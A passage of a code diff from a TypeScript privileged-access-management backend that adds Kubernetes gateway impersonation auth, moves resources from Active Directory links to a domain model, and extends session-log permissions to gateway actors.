[namespace=${credentials.namespace}] [sa=${credentials.serviceAccountName}]` + ); + } catch (error) { + if (error instanceof AxiosError) { + const errorMessage = + (error.response?.data as { message?: string })?.message || error.response?.statusText || error.message; + + if (errorMessage?.includes("failed to read k8s sa auth token")) { + throw new BadRequestError({ + message: + "Gateway is not running inside a Kubernetes cluster. Gateway auth requires the gateway to be deployed as a pod." + }); + } + if (error.response?.status === 403) { + if (errorMessage?.includes("impersonate")) { + throw new BadRequestError({ + message: `Gateway service account lacks impersonation permissions for service account "${credentials.serviceAccountName}" in namespace "${credentials.namespace}". 
Ensure the gateway's ClusterRole includes the impersonate verb for this service account.` + }); + } + throw new BadRequestError({ + message: `Unable to impersonate service account "${credentials.serviceAccountName}" in namespace "${credentials.namespace}": ${errorMessage}` + }); + } + if (error.code === "ECONNABORTED" || error.code === "ERR_CANCELED") { + throw new BadRequestError({ + message: "Unable to reach the Kubernetes API server through the gateway." + }); + } + throw new BadRequestError({ + message: `Unable to validate gateway auth credentials: ${errorMessage}` + }); + } + throw error; + } + }); + return credentials; + } catch (error) { + if (error instanceof BadRequestError) { + throw error; + } + throw new BadRequestError({ + message: `Unable to validate account credentials for ${resourceType}: ${(error as Error).message || String(error)}` + }); + } + } + + throw new BadRequestError({ + message: `Unsupported Kubernetes auth method: ${authMethod as string}` + }); }; const rotateAccountCredentials: TPamResourceFactoryRotateAccountCredentials< @@ -215,6 +325,9 @@ export const kubernetesResourceFactory: TPamResourceFactory< } } + // Gateway auth has no sensitive fields (namespace and serviceAccountName are identifiers, not secrets), + // so no sentinel handling is needed β€” fall through to return as-is. 
+ return updatedAccountCredentials; }; diff --git a/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-schemas.ts b/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-schemas.ts index aa60e91fb45..4e2b8362575 100644 --- a/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/kubernetes/kubernetes-resource-schemas.ts @@ -36,8 +36,15 @@ export const KubernetesServiceAccountTokenCredentialsSchema = z.object({ serviceAccountToken: z.string().trim().max(10000) }); +export const KubernetesGatewayAuthCredentialsSchema = z.object({ + authMethod: z.literal(KubernetesAuthMethod.GatewayKubernetesAuth), + namespace: z.string().trim().min(1).max(63), + serviceAccountName: z.string().trim().min(1).max(253) +}); + export const KubernetesAccountCredentialsSchema = z.discriminatedUnion("authMethod", [ - KubernetesServiceAccountTokenCredentialsSchema + KubernetesServiceAccountTokenCredentialsSchema, + KubernetesGatewayAuthCredentialsSchema ]); export const KubernetesResourceSchema = BaseKubernetesResourceSchema.extend({ @@ -51,6 +58,11 @@ export const SanitizedKubernetesResourceSchema = BaseKubernetesResourceSchema.ex .discriminatedUnion("authMethod", [ z.object({ authMethod: z.literal(KubernetesAuthMethod.ServiceAccountToken) + }), + z.object({ + authMethod: z.literal(KubernetesAuthMethod.GatewayKubernetesAuth), + namespace: z.string(), + serviceAccountName: z.string() }) ]) .nullable() @@ -81,10 +93,15 @@ export const UpdateKubernetesAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedKubernetesAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.Kubernetes), + parentType: z.literal(PamResource.Kubernetes), credentials: z.discriminatedUnion("authMethod", [ z.object({ authMethod: z.literal(KubernetesAuthMethod.ServiceAccountToken) + }), + z.object({ + authMethod: 
z.literal(KubernetesAuthMethod.GatewayKubernetesAuth), + namespace: z.string(), + serviceAccountName: z.string() }) ]) }); diff --git a/backend/src/ee/services/pam-resource/mongodb/mongodb-resource-schemas.ts b/backend/src/ee/services/pam-resource/mongodb/mongodb-resource-schemas.ts index eb2eea7b8da..dc4f3be59ca 100644 --- a/backend/src/ee/services/pam-resource/mongodb/mongodb-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/mongodb/mongodb-resource-schemas.ts @@ -117,7 +117,7 @@ export const UpdateMongoDBAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedMongoDBAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.MongoDB), + parentType: z.literal(PamResource.MongoDB), credentials: MongoDBAccountCredentialsSchema.pick({ username: true }) diff --git a/backend/src/ee/services/pam-resource/mssql/mssql-resource-schemas.ts b/backend/src/ee/services/pam-resource/mssql/mssql-resource-schemas.ts index d865563b619..b7f15197be0 100644 --- a/backend/src/ee/services/pam-resource/mssql/mssql-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/mssql/mssql-resource-schemas.ts @@ -64,7 +64,7 @@ export const UpdateMsSQLAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedMsSQLAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.MsSQL), + parentType: z.literal(PamResource.MsSQL), credentials: MsSQLAccountCredentialsSchema.pick({ username: true }) diff --git a/backend/src/ee/services/pam-resource/mysql/mysql-resource-schemas.ts b/backend/src/ee/services/pam-resource/mysql/mysql-resource-schemas.ts index 61a88246cda..9f6604c2cc5 100644 --- a/backend/src/ee/services/pam-resource/mysql/mysql-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/mysql/mysql-resource-schemas.ts @@ -67,7 +67,7 @@ export const UpdateMySQLAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const 
SanitizedMySQLAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.MySQL), + parentType: z.literal(PamResource.MySQL), credentials: MySQLAccountCredentialsSchema.pick({ username: true }) diff --git a/backend/src/ee/services/pam-resource/pam-resource-dal.ts b/backend/src/ee/services/pam-resource/pam-resource-dal.ts index 6a35aff50c2..8429700c5be 100644 --- a/backend/src/ee/services/pam-resource/pam-resource-dal.ts +++ b/backend/src/ee/services/pam-resource/pam-resource-dal.ts @@ -135,16 +135,16 @@ export const pamResourceDALFactory = (db: TDbClient) => { return byResourceId; }; - const findByAdServerResourceId = async (adServerResourceId: string, tx?: Knex) => { + const findByDomainId = async (domainId: string, tx?: Knex) => { try { const resources = await (tx || db.replicaNode())(TableName.PamResource) .select(selectAllTableCols(TableName.PamResource)) - .where(`${TableName.PamResource}.adServerResourceId`, adServerResourceId) + .where(`${TableName.PamResource}.domainId`, domainId) .orderBy(`${TableName.PamResource}.name`, "asc"); return resources; } catch (error) { - throw new DatabaseError({ error, name: "Find PAM resources by AD server resource ID" }); + throw new DatabaseError({ error, name: "Find PAM resources by domain ID" }); } }; @@ -177,7 +177,7 @@ export const pamResourceDALFactory = (db: TDbClient) => { findById, findByProjectId, findMetadataByResourceIds, - findByAdServerResourceId, + findByDomainId, findByGatewayId, countByGatewayId }; diff --git a/backend/src/ee/services/pam-resource/pam-resource-enums.ts b/backend/src/ee/services/pam-resource/pam-resource-enums.ts index bb7476b62e8..6fdeb10fb3d 100644 --- a/backend/src/ee/services/pam-resource/pam-resource-enums.ts +++ b/backend/src/ee/services/pam-resource/pam-resource-enums.ts @@ -7,8 +7,7 @@ export enum PamResource { AwsIam = "aws-iam", Redis = "redis", MongoDB = "mongodb", - Windows = "windows", - ActiveDirectory = "active-directory" + 
Windows = "windows" } export enum PamResourceOrderBy { diff --git a/backend/src/ee/services/pam-resource/pam-resource-factory.ts b/backend/src/ee/services/pam-resource/pam-resource-factory.ts index 06f9020431c..6cbbbc23aca 100644 --- a/backend/src/ee/services/pam-resource/pam-resource-factory.ts +++ b/backend/src/ee/services/pam-resource/pam-resource-factory.ts @@ -1,4 +1,3 @@ -import { activeDirectoryResourceFactory } from "./active-directory/active-directory-resource-factory"; import { awsIamResourceFactory } from "./aws-iam/aws-iam-resource-factory"; import { kubernetesResourceFactory } from "./kubernetes/kubernetes-resource-factory"; import { mongodbResourceFactory } from "./mongodb/mongodb-resource-factory"; @@ -29,6 +28,5 @@ export const PAM_RESOURCE_FACTORY_MAP: Record { getRedisResourceListItem(), getMongoDBResourceListItem(), getWindowsResourceListItem(), - getActiveDirectoryResourceListItem(), getSshResourceListItem() ].sort((a, b) => a.name.localeCompare(b.name)); }; @@ -122,9 +120,15 @@ export const decryptResource = async ( projectId: string, kmsService: Pick ) => { - let sessionSummaryConfig: { aiInsightsEnabled: boolean; connectionId: string; model: string } | null = null; + const { + encryptedConnectionDetails, + encryptedRotationAccountCredentials, + encryptedResourceMetadata, + encryptedSessionSummaryConfig, + ...rest + } = resource; - const { encryptedSessionSummaryConfig } = resource; + let sessionSummaryConfig: { aiInsightsEnabled: boolean; connectionId: string; model: string } | null = null; if (encryptedSessionSummaryConfig) { try { @@ -146,15 +150,15 @@ export const decryptResource = async ( } return { - ...resource, + ...rest, connectionDetails: await decryptResourceConnectionDetails({ - encryptedConnectionDetails: resource.encryptedConnectionDetails, + encryptedConnectionDetails, projectId, kmsService }), - rotationAccountCredentials: resource.encryptedRotationAccountCredentials + rotationAccountCredentials: 
encryptedRotationAccountCredentials ? await decryptAccountCredentials({ - encryptedCredentials: resource.encryptedRotationAccountCredentials, + encryptedCredentials: encryptedRotationAccountCredentials, projectId, kmsService }) diff --git a/backend/src/ee/services/pam-resource/pam-resource-schemas.ts b/backend/src/ee/services/pam-resource/pam-resource-schemas.ts index f41d0b75996..0af9b9ef2c7 100644 --- a/backend/src/ee/services/pam-resource/pam-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/pam-resource-schemas.ts @@ -1,6 +1,8 @@ import { z } from "zod"; -import { PamAccountsSchema, PamResourcesSchema, ResourceMetadataSchema } from "@app/db/schemas"; +import { PamAccountsSchema, PamDomainsSchema, PamResourcesSchema, ResourceMetadataSchema } from "@app/db/schemas"; +import { PamDomainType } from "@app/ee/services/pam-domain/pam-domain-enums"; +import { PamResource } from "@app/ee/services/pam-resource/pam-resource-enums"; import { slugSchema } from "@app/server/lib/schemas"; import { ResourceMetadataNonEncryptionSchema } from "@app/services/resource-metadata/resource-metadata-schema"; @@ -36,6 +38,7 @@ export const SessionSummaryConfigSchema = z export const BasePamResourceSchema = PamResourcesSchema.omit({ encryptedConnectionDetails: true, encryptedRotationAccountCredentials: true, + encryptedResourceMetadata: true, encryptedSessionSummaryConfig: true, resourceType: true }).extend({ @@ -75,16 +78,22 @@ export const BasePamAccountSchema = PamAccountsSchema.omit({ }); export const BasePamAccountSchemaWithResource = BasePamAccountSchema.extend({ + parentType: z.union([z.nativeEnum(PamResource), z.nativeEnum(PamDomainType)]), resource: PamResourcesSchema.pick({ id: true, name: true, resourceType: true - }).extend({ - rotationCredentialsConfigured: z.boolean() - }), + }) + .extend({ + rotationCredentialsConfigured: z.boolean() + }) + .nullable() + .optional(), + domain: PamDomainsSchema.pick({ id: true, name: true, domainType: true 
}).nullable().optional(), policyName: z.string().nullable().optional(), lastRotationMessage: z.string().nullable().optional(), - rotationStatus: z.string().nullable().optional() + rotationStatus: z.string().nullable().optional(), + requireReason: z.boolean().default(false) }); export const BaseCreatePamAccountSchema = z.object({ diff --git a/backend/src/ee/services/pam-resource/pam-resource-service.ts b/backend/src/ee/services/pam-resource/pam-resource-service.ts index ed040baf2c4..ba43eb33e8a 100644 --- a/backend/src/ee/services/pam-resource/pam-resource-service.ts +++ b/backend/src/ee/services/pam-resource/pam-resource-service.ts @@ -25,6 +25,7 @@ import { TGatewayV2ServiceFactory } from "../gateway-v2/gateway-v2-service"; import { TPamAccountDALFactory } from "../pam-account/pam-account-dal"; import { PamAccountView } from "../pam-account/pam-account-enums"; import { decryptAccountCredentials, encryptAccountCredentials } from "../pam-account/pam-account-fns"; +import { TPamDomainDALFactory } from "../pam-domain/pam-domain-dal"; import { TPamResourceDALFactory } from "./pam-resource-dal"; import { PamResource } from "./pam-resource-enums"; import { PAM_RESOURCE_FACTORY_MAP } from "./pam-resource-factory"; @@ -39,7 +40,6 @@ import { } from "./pam-resource-fns"; import { TCreateResourceDTO, TListResourcesDTO, TUpdateResourceDTO } from "./pam-resource-types"; import { TSSHResourceInternalMetadata } from "./ssh/ssh-resource-types"; -import { TWindowsResource } from "./windows-server/windows-server-resource-types"; // Extend this set as more LLM providers are added (e.g. 
AppConnection.OpenAI) const LLM_APP_CONNECTIONS = new Set([AppConnection.Anthropic]); @@ -50,7 +50,8 @@ const AI_SUMMARY_SUPPORTED_RESOURCE_TYPES = new Set([PamResource.Po type TPamResourceServiceFactoryDep = { pamResourceDAL: TPamResourceDALFactory; pamResourceFavoriteDAL: TPamResourceFavoriteDALFactory; - pamAccountDAL: Pick; + pamDomainDAL: Pick; + pamAccountDAL: Pick; permissionService: Pick; kmsService: Pick; gatewayV2Service: Pick< @@ -66,6 +67,7 @@ export type TPamResourceServiceFactory = ReturnType { + const assertDomainInProject = async (domainId: string, projectId: string) => { + const domain = await pamDomainDAL.findById(domainId); + if (!domain) throw new NotFoundError({ message: `Domain with ID '${domainId}' not found` }); + if (domain.projectId !== projectId) { + throw new BadRequestError({ message: "Domain must belong to the same project as the resource" }); + } + }; + const getById = async (id: string, resourceType: PamResource, actor: OrgServiceActor) => { const resource = await pamResourceDAL.findById(id); if (!resource) throw new NotFoundError({ message: `Resource with ID '${id}' not found` }); @@ -101,7 +111,7 @@ export const pamResourceServiceFactory = ({ if (!canReadResources) { // Check if user can read at least one account in this resource - const { accounts } = await pamAccountDAL.findByProjectIdWithResourceDetails({ + const { accounts } = await pamAccountDAL.findByProjectIdWithParentDetails({ projectId: resource.projectId, accountView: PamAccountView.Flat, filterResourceIds: [id] @@ -154,7 +164,7 @@ export const pamResourceServiceFactory = ({ name, projectId, rotationAccountCredentials, - adServerResourceId, + domainId, metadata }: TCreateResourceDTO, actor: OrgServiceActor @@ -177,6 +187,10 @@ export const pamResourceServiceFactory = ({ }) ); + if (domainId) { + await assertDomainInProject(domainId, projectId); + } + const factory = PAM_RESOURCE_FACTORY_MAP[resourceType]( resourceType, connectionDetails, @@ -192,15 +206,6 @@ export const 
pamResourceServiceFactory = ({ kmsService }); - if (adServerResourceId) { - const adResource = await pamResourceDAL.findById(adServerResourceId); - if (!adResource) - throw new NotFoundError({ message: `AD Server resource with ID '${adServerResourceId}' not found` }); - if (adResource.projectId !== projectId) { - throw new BadRequestError({ message: "AD Server resource must belong to the same project" }); - } - } - let encryptedRotationAccountCredentials: Buffer | null = null; if (rotationAccountCredentials) { @@ -223,7 +228,7 @@ export const pamResourceServiceFactory = ({ name, projectId, encryptedRotationAccountCredentials, - adServerResourceId: adServerResourceId ?? null + domainId: domainId ?? null }, tx ); @@ -263,7 +268,7 @@ export const pamResourceServiceFactory = ({ name, rotationAccountCredentials, gatewayId, - adServerResourceId, + domainId, metadata, sessionSummaryConfig }: TUpdateResourceDTO, @@ -319,16 +324,11 @@ export const pamResourceServiceFactory = ({ updateDoc.name = name; } - if (adServerResourceId !== undefined) { - if (adServerResourceId) { - const adResource = await pamResourceDAL.findById(adServerResourceId); - if (!adResource) - throw new NotFoundError({ message: `AD Server resource with ID '${adServerResourceId}' not found` }); - if (adResource.projectId !== resource.projectId) { - throw new BadRequestError({ message: "AD Server resource must belong to the same project" }); - } + if (domainId !== undefined) { + if (domainId) { + await assertDomainInProject(domainId, resource.projectId); } - updateDoc.adServerResourceId = adServerResourceId; + updateDoc.domainId = domainId; } if (connectionDetails !== undefined) { @@ -647,7 +647,7 @@ export const pamResourceServiceFactory = ({ } // Fetch all accounts for the project (flat view, no pagination) for permission checking - const { accounts: allAccounts } = await pamAccountDAL.findByProjectIdWithResourceDetails({ + const { accounts: allAccounts } = await 
pamAccountDAL.findByProjectIdWithParentDetails({ projectId, accountView: PamAccountView.Flat }); @@ -666,9 +666,12 @@ export const pamResourceServiceFactory = ({ Array<{ accountName: string; metadata: Array<{ id: string; key: string; value: string }> }> >(); for (const account of allAccounts) { - const existing = accountsByResourceId.get(account.resourceId) || []; - existing.push({ accountName: account.name, metadata: accountMetadata[account.id] || [] }); - accountsByResourceId.set(account.resourceId, existing); + if (account.resourceId) { + // Skip domain accounts for resource-level permission check + const existing = accountsByResourceId.get(account.resourceId) || []; + existing.push({ accountName: account.name, metadata: accountMetadata[account.id] || [] }); + accountsByResourceId.set(account.resourceId, existing); + } } // Filter to only resources where the user can read at least one account @@ -784,41 +787,6 @@ export const pamResourceServiceFactory = ({ return { caPublicKey }; }; - const listRelatedResources = async (adServerResourceId: string, actor: OrgServiceActor) => { - const resource = await pamResourceDAL.findById(adServerResourceId); - if (!resource) throw new NotFoundError({ message: `Resource with ID '${adServerResourceId}' not found` }); - - if (resource.resourceType !== PamResource.ActiveDirectory) { - throw new BadRequestError({ message: "Related resources can only be listed for Active Directory resources" }); - } - - const { permission } = await permissionService.getProjectPermission({ - actor: actor.type, - actorAuthMethod: actor.authMethod, - actorId: actor.id, - actorOrgId: actor.orgId, - projectId: resource.projectId, - actionProjectType: ActionProjectType.PAM - }); - - const metadataByResourceId = await pamResourceDAL.findMetadataByResourceIds([adServerResourceId]); - - ForbiddenError.from(permission).throwUnlessCan( - ProjectPermissionActions.Read, - subject(ProjectPermissionSub.PamResources, { - name: resource.name, - resourceType: 
resource.resourceType, - metadata: metadataByResourceId[adServerResourceId] || [] - }) - ); - - const relatedResources = await pamResourceDAL.findByAdServerResourceId(adServerResourceId); - - return Promise.all( - relatedResources.map((r) => decryptResource(r, resource.projectId, kmsService) as Promise) - ); - }; - const setUserResourceFavorite = async ({ projectId, resourceId, @@ -875,7 +843,6 @@ export const pamResourceServiceFactory = ({ list, listResourceOptions, getOrCreateSshCa, - listRelatedResources, setUserResourceFavorite }; }; diff --git a/backend/src/ee/services/pam-resource/pam-resource-types.ts b/backend/src/ee/services/pam-resource/pam-resource-types.ts index 2298c4ab3d7..02f3bbfbd86 100644 --- a/backend/src/ee/services/pam-resource/pam-resource-types.ts +++ b/backend/src/ee/services/pam-resource/pam-resource-types.ts @@ -8,12 +8,6 @@ import { ResourceMetadataNonEncryptionSchema } from "@app/services/resource-meta import { TGatewayV2ServiceFactory } from "../gateway-v2/gateway-v2-service"; import { TPamAccountDependenciesDALFactory } from "../pam-discovery/pam-account-dependencies-dal"; -import { - TActiveDirectoryAccount, - TActiveDirectoryAccountCredentials, - TActiveDirectoryResource, - TActiveDirectoryResourceConnectionDetails -} from "./active-directory/active-directory-resource-types"; import { TAwsIamAccount, TAwsIamAccountCredentials, @@ -83,8 +77,7 @@ export type TPamResource = | TKubernetesResource | TRedisResource | TMongoDBResource - | TWindowsResource - | TActiveDirectoryResource; + | TWindowsResource; export type TPamResourceWithFavorite = TPamResources & { isFavorite: boolean }; export type TPamResourceConnectionDetails = | TPostgresResourceConnectionDetails @@ -95,8 +88,7 @@ export type TPamResourceConnectionDetails = | TAwsIamResourceConnectionDetails | TRedisResourceConnectionDetails | TMongoDBResourceConnectionDetails - | TWindowsResourceConnectionDetails - | TActiveDirectoryResourceConnectionDetails; + | 
TWindowsResourceConnectionDetails; export type TPamResourceInternalMetadata = TSSHResourceInternalMetadata | TWindowsResourceInternalMetadata; // Account types @@ -109,8 +101,7 @@ export type TPamAccount = | TKubernetesAccount | TRedisAccount | TMongoDBAccount - | TWindowsAccount - | TActiveDirectoryAccount; + | TWindowsAccount; export type TPamAccountCredentials = | TPostgresAccountCredentials @@ -121,14 +112,13 @@ export type TPamAccountCredentials = | TAwsIamAccountCredentials | TRedisAccountCredentials | TMongoDBAccountCredentials - | TWindowsAccountCredentials - | TActiveDirectoryAccountCredentials; + | TWindowsAccountCredentials; // Resource DTOs export type TCreateResourceDTO = Pick & { gatewayId?: string | null; rotationAccountCredentials?: TPamAccountCredentials | null; - adServerResourceId?: string | null; + domainId?: string | null; metadata?: z.input; }; diff --git a/backend/src/ee/services/pam-resource/postgres/postgres-resource-schemas.ts b/backend/src/ee/services/pam-resource/postgres/postgres-resource-schemas.ts index 554a414c9a3..4d6e3c945c8 100644 --- a/backend/src/ee/services/pam-resource/postgres/postgres-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/postgres/postgres-resource-schemas.ts @@ -64,7 +64,7 @@ export const UpdatePostgresAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedPostgresAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.Postgres), + parentType: z.literal(PamResource.Postgres), credentials: PostgresAccountCredentialsSchema.pick({ username: true }) diff --git a/backend/src/ee/services/pam-resource/redis/redis-resource-schemas.ts b/backend/src/ee/services/pam-resource/redis/redis-resource-schemas.ts index 99c578e730a..2070498612b 100644 --- a/backend/src/ee/services/pam-resource/redis/redis-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/redis/redis-resource-schemas.ts @@ -83,7 +83,7 @@ export const 
UpdateRedisAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedRedisAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.Redis), + parentType: z.literal(PamResource.Redis), credentials: RedisAccountCredentialsSchema.pick({ username: true }) diff --git a/backend/src/ee/services/pam-resource/ssh/ssh-resource-schemas.ts b/backend/src/ee/services/pam-resource/ssh/ssh-resource-schemas.ts index fa06bfb3534..61866cfbb6e 100644 --- a/backend/src/ee/services/pam-resource/ssh/ssh-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/ssh/ssh-resource-schemas.ts @@ -100,6 +100,11 @@ export const SSHResourceInternalMetadataSchema = z.object({ caKeyAlgorithm: z.string() }); +export const SanitizedSSHResourceInternalMetadataSchema = SSHResourceInternalMetadataSchema.pick({ + caPublicKey: true, + caKeyAlgorithm: true +}); + // Accounts export const SSHAccountSchema = BasePamAccountSchema.extend({ credentials: SSHAccountCredentialsSchema @@ -114,7 +119,7 @@ export const UpdateSSHAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedSSHAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.SSH), + parentType: z.literal(PamResource.SSH), credentials: z.discriminatedUnion("authMethod", [ z.object({ authMethod: z.literal(SSHAuthMethod.Password), diff --git a/backend/src/ee/services/pam-resource/windows-server/windows-server-resource-schemas.ts b/backend/src/ee/services/pam-resource/windows-server/windows-server-resource-schemas.ts index 29385e2f613..76da493dc0f 100644 --- a/backend/src/ee/services/pam-resource/windows-server/windows-server-resource-schemas.ts +++ b/backend/src/ee/services/pam-resource/windows-server/windows-server-resource-schemas.ts @@ -64,6 +64,11 @@ export const WindowsResourceInternalMetadataSchema = z.object({ osVersionDetail: z.string().optional() }); +export const 
SanitizedWindowsResourceInternalMetadataSchema = WindowsResourceInternalMetadataSchema.pick({ + osVersion: true, + osVersionDetail: true +}); + export const WindowsResourceSchema = BaseWindowsResourceSchema.extend({ connectionDetails: WindowsResourceConnectionDetailsSchema, rotationAccountCredentials: WindowsAccountCredentialsSchema.nullable().optional() @@ -82,13 +87,13 @@ export const SanitizedWindowsResourceSchema = BaseWindowsResourceSchema.extend({ export const CreateWindowsResourceSchema = BaseCreateGatewayPamResourceSchema.extend({ connectionDetails: WindowsResourceConnectionDetailsSchema, rotationAccountCredentials: WindowsAccountCredentialsSchema.nullable().optional(), - adServerResourceId: z.string().uuid().nullable().optional() + domainId: z.string().uuid().nullable().optional() }); export const UpdateWindowsResourceSchema = BaseUpdateGatewayPamResourceSchema.extend({ connectionDetails: WindowsResourceConnectionDetailsSchema.optional(), rotationAccountCredentials: WindowsAccountCredentialsSchema.nullable().optional(), - adServerResourceId: z.string().uuid().nullable().optional() + domainId: z.string().uuid().nullable().optional() }); // Accounts @@ -108,7 +113,7 @@ export const UpdateWindowsAccountSchema = BaseUpdatePamAccountSchema.extend({ }); export const SanitizedWindowsAccountWithResourceSchema = BasePamAccountSchemaWithResource.extend({ - resourceType: z.literal(PamResource.Windows), + parentType: z.literal(PamResource.Windows), credentials: z.object({ username: z.string() }), diff --git a/backend/src/ee/services/pam-session/pam-session-dal.ts b/backend/src/ee/services/pam-session/pam-session-dal.ts index 7da9305522c..693f62a8c2b 100644 --- a/backend/src/ee/services/pam-session/pam-session-dal.ts +++ b/backend/src/ee/services/pam-session/pam-session-dal.ts @@ -58,6 +58,7 @@ export const pamSessionDALFactory = (db: TDbClient) => { .leftJoin(TableName.GatewayV2, `${TableName.PamResource}.gatewayId`, `${TableName.GatewayV2}.id`) 
.select(selectAllTableCols(TableName.PamSession)) .select(db.ref("identityId").withSchema(TableName.GatewayV2).as("gatewayIdentityId")) + .select(db.ref("id").withSchema(TableName.GatewayV2).as("gatewayId")) .where(`${TableName.PamSession}.projectId`, projectId); return sessions; diff --git a/backend/src/ee/services/pam-session/pam-session-schemas.ts b/backend/src/ee/services/pam-session/pam-session-schemas.ts index 8174aafb7a1..c2e397494f5 100644 --- a/backend/src/ee/services/pam-session/pam-session-schemas.ts +++ b/backend/src/ee/services/pam-session/pam-session-schemas.ts @@ -60,6 +60,7 @@ export const SanitizedSessionSchema = PamSessionsSchema.omit({ }).extend({ logs: z.array(z.union([PamSessionCommandLogSchema, HttpEventSchema, TerminalEventSchema])), gatewayIdentityId: z.string().nullable().optional(), + gatewayId: z.string().nullable().optional(), aiInsights: AiInsightsSchema }); diff --git a/backend/src/ee/services/pam-session/pam-session-service.ts b/backend/src/ee/services/pam-session/pam-session-service.ts index a5920313e6e..8c5e72fd860 100644 --- a/backend/src/ee/services/pam-session/pam-session-service.ts +++ b/backend/src/ee/services/pam-session/pam-session-service.ts @@ -7,6 +7,8 @@ import { BadRequestError, ForbiddenRequestError, NotFoundError } from "@app/lib/ import { GatewayProxyProtocol } from "@app/lib/gateway/types"; import { createGatewayConnection, createRelayConnection } from "@app/lib/gateway-v2/gateway-v2"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { OrgServiceActor } from "@app/lib/types"; import { ActorType } from "@app/services/auth/auth-type"; import { TKmsServiceFactory } from "@app/services/kms/kms-service"; @@ -57,13 +59,14 @@ export const pamSessionServiceFactory = ({ status: string; expiresAt: Date | null; gatewayIdentityId?: string | null; + gatewayId?: string | null; 
projectId?: string | null; } >( session: T ): Promise => { // Skip gateway-based sessions - they have their own lifecycle managed by the gateway - if (session.gatewayIdentityId) { + if (session.gatewayIdentityId || session.gatewayId) { return session; } @@ -142,8 +145,8 @@ export const pamSessionServiceFactory = ({ }; const updateLogsById = async ({ sessionId, logs }: TUpdateSessionLogsDTO, actor: OrgServiceActor) => { - // To be hit by gateways only - if (actor.type !== ActorType.IDENTITY) { + // To be hit by gateways only (identity-based or enrollment-flow) + if (actor.type !== ActorType.IDENTITY && actor.type !== ActorType.GATEWAY) { throw new ForbiddenRequestError({ message: "Only gateways can perform this action" }); } @@ -154,25 +157,37 @@ export const pamSessionServiceFactory = ({ throw new BadRequestError({ message: "Cannot update logs for sessions with existing logs" }); } - const project = await projectDAL.findById(session.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(session.projectId), () => + projectDAL.findById(session.projectId) + ); if (!project) throw new NotFoundError({ message: `Project with ID '${session.projectId}' not found` }); - const { permission } = await permissionService.getOrgPermission({ - actor: actor.type, - actorId: actor.id, - orgId: project.orgId, - actorAuthMethod: actor.authMethod, - actorOrgId: actor.orgId, - scope: OrganizationActionScope.Any - }); + if (actor.type === ActorType.IDENTITY) { + const { permission } = await permissionService.getOrgPermission({ + actor: actor.type, + actorId: actor.id, + orgId: project.orgId, + actorAuthMethod: actor.authMethod, + actorOrgId: actor.orgId, + scope: OrganizationActionScope.Any + }); - ForbiddenError.from(permission).throwUnlessCan( - OrgPermissionGatewayActions.CreateGateways, - OrgPermissionSubjects.Gateway - ); + ForbiddenError.from(permission).throwUnlessCan( + OrgPermissionGatewayActions.CreateGateways, + OrgPermissionSubjects.Gateway + ); + 
} else if (actor.type === ActorType.GATEWAY) { + if (project.orgId !== actor.orgId) { + throw new ForbiddenRequestError({ message: "Gateway does not have access to this session" }); + } + } - if (session.gatewayIdentityId && session.gatewayIdentityId !== actor.id) { - throw new ForbiddenRequestError({ message: "Identity does not have access to update logs for this session" }); + const authorized = + actor.type === ActorType.GATEWAY + ? !session.gatewayId || session.gatewayId === actor.id + : !session.gatewayIdentityId || session.gatewayIdentityId === actor.id; + if (!authorized) { + throw new ForbiddenRequestError({ message: "Gateway does not have access to update logs for this session" }); } const { encryptor } = await kmsService.createCipherPairWithDataKey({ @@ -188,26 +203,28 @@ export const pamSessionServiceFactory = ({ encryptedLogsBlob: cipherTextBlob }); - return { session: updatedSession, projectId: project.id }; + return { session: updatedSession, projectId: session.projectId }; }; const endSessionById = async (sessionId: string, actor: OrgServiceActor) => { const session = await pamSessionDAL.findById(sessionId); if (!session) throw new NotFoundError({ message: `Session with ID '${sessionId}' not found` }); - const project = await projectDAL.findById(session.projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(session.projectId), () => + projectDAL.findById(session.projectId) + ); if (!project) throw new NotFoundError({ message: `Project with ID '${session.projectId}' not found` }); - const { permission } = await permissionService.getOrgPermission({ - actor: actor.type, - actorId: actor.id, - orgId: project.orgId, - actorAuthMethod: actor.authMethod, - actorOrgId: actor.orgId, - scope: OrganizationActionScope.Any - }); - if (actor.type === ActorType.IDENTITY) { + const { permission } = await permissionService.getOrgPermission({ + actor: actor.type, + actorId: actor.id, + orgId: project.orgId, + actorAuthMethod: 
